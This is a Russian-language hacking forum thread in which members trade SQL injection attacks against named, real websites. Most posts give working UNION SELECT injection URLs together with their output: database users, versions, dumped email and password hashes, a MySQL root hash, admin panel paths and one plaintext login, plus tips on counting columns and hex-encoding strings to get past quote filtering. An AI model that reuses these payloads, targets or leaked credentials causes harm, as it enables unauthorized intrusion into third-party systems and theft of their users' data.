SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    токо там по определенному ир(
    логин и пасс adminus:lPO7YBB0
     
    1 person likes this.
  2. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    user(): u_pogodatwo@localhost
    version(): 4.1.22
    database(): pogodatwo
     
  3. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    докрутил до етого test:test
    а вот табличку с админами ненашел(((
     
  4. flem

    flem Member

    Joined:
    17 May 2008
    Messages:
    4
    Likes Received:
    8
    Reputations:
    0
    zifanchuck, ну вот одминка pogoda.ua/admin только вот test:test неподходит!
     
  5. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    админку я тожєе нашол а вот пасс админа невыяснеил(((
     
  6. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    http://www.emayhem.com/profiles/profile.php?profile=1'
    http://www.emayhem.com/profiles/profile.php?profile=-1+union+select+1,2,concat_ws(0x3a,user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&wId=4 => marty@localhost:5.0.37-log
    http://www.emayhem.com/profiles/profile.php?profile=-1+union+select+1,2,concat_ws(0x3a,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users+limit+0,1/*&wId=4 => [email protected]:ad452de6a1c6876e66abe0e853b6c0ad
    че за хрень? версия 5 а не выводит из information_schema(( кто поможет?)
     
  7. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    1.
    Code:
    http://www.flatlux.kiev.ua/rus/index.php?categoryID=-7+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6--
    flatlux_ower@saturn:flatlux_main:4.1.22-log
    PR:5
    Тиц:160
    2.
    Code:
    http://www.membrana.kiev.ua/catalogue.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11--
    root@localhost:membrana:4.0.23a
    PR:0
    тИЦ: 10

    Code:
    http://www.membrana.kiev.ua/catalogue.php?id=-1+union+select+1,2,3,concat(user,0x3a,password,0x3a,file_priv),5,6,7,8,9,10,11+from+mysql.user--
    root:4fc7a3a65139e6ae:N
    3.
    Code:
    http://stroybat.kiev.ua/index.php?pid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11--&showpage=1
    stroybat_stroy1@localhost:stroybat_stroybat:5.0.51a-community
    PR:3
    тИЦ: 30


    Code:
    http://stroybat.kiev.ua/index.php?pid=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables--&showpage=1
     
  8. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://wow.cybergame.su/index.php?newsid=999999+union+select+1,version(),3,4,5,6%20--
    Как можно посмотреть что выдало при такой скуле. Просто на экране ни че не видо или я не вижу -(
     
  9. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    а там точно скуль??? я неуверен (я правда новичек)
    я думаю там ее нету
     
    1 person likes this.
  10. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    Так я все таки прав?? мне кажеться что там иньектом и не пахнет.
    А как там на самом деле.... может и есть там скуля
     
  11. Merl00k

    Merl00k Member

    Joined:
    6 Nov 2008
    Messages:
    27
    Likes Received:
    10
    Reputations:
    0
    На скока если я знаю инъекция вслепую то некак
     
  12. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Aedes.com - PR 4 ~1к
    Northcoast101.com - PR 4 ~1к
    4 ветка
    /admin

    Dsmi.tobw.net - PR 4 ~1к
    (

    Nlstar.com - PR 3 ~0.7к
    еще какойто..
     
    #7332 sabe, 8 Jan 2009
    Last edited: 8 Jan 2009
  13. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    версия 5.0.70-log

     
    #7333 zifanchuck, 8 Jan 2009
    Last edited: 8 Jan 2009
  14. Merl00k

    Merl00k Member

    Joined:
    6 Nov 2008
    Messages:
    27
    Likes Received:
    10
    Reputations:
    0
    Assembler

    там нету уязвимости
     
  15. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5,6+from+information_schema.tables--
    
    судя по отсутствии ошибки при запросе к information_schema, версия там пятая, но вывода что-то не замечаю...
     
  16. Merl00k

    Merl00k Member

    Joined:
    6 Nov 2008
    Messages:
    27
    Likes Received:
    10
    Reputations:
    0
    sharoff

    а ты уверен что там есть бага ?
     
  17. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5--
    Выдает: The used SELECT statements have a different number of columns

    Code:
    http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5,6--
    Ошибка исчезла.

    Итог:

    6 стоблоцов, вывода нет.

    ЗЫ: В этой теме выкладывать инъект, а вопросы - в соседней.
     
    1 person likes this.
  18. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+informa tion_schema.columns+where+table_name='account'--
    И опять что то не то.
     
  19. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+information_schema.columns+where+table_name=0x6163636f756e74--
    Там стоит фильтрация кавычек, пользуемся hex
    0x6163636f756e74 представляет собой запись account


    Еще раз повторяю, вывода там нету, никакой column_name ты не увидишь.
     
    #7339 sharoff, 8 Jan 2009
    Last edited: 8 Jan 2009
  20. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Code:
    http://www.winlinanswers.com/book/resources.php?id=8'+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5   ,6,7,8,9,10,11/*
    user(): jeremym@localhost
    version(): 4.1.22
    database(): MOSKOWITZ
    PR: 6


    Code:
    http://www.admanager.nl/online/page.php?id=-8+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4--
    user(): [email protected]
    version(): 4.1.22
    database(): admanager
    PR: 5


    Code:
    http://www.fhmbuurmeisje.nl/profile.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user(),0x3a,ve   rsion(),0x3a,database())--
    user(): ttg-db@localhost
    version(): 4.1.20-log
    database(): ttg-fhm
    PR: 3


    Code:
    http://www.pca.org.au/?id=-8+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12--
    user(): [email protected]
    version(): 5.0.32-Debian_7etch6-log
    database(): pca_pca_org_au
    PR: 5

    нашёл таблицу tblmemberlogin, в ней одно поле "txtPassword"

    в таблице всего два хэша:
    b334044a3535f437c14f24c1e76ae3fb
    5f4dcc3b5aa765d61d8327deb882cf99:password

    логина нет (толком не искал)
     
Thread Status:
Not open for further replies.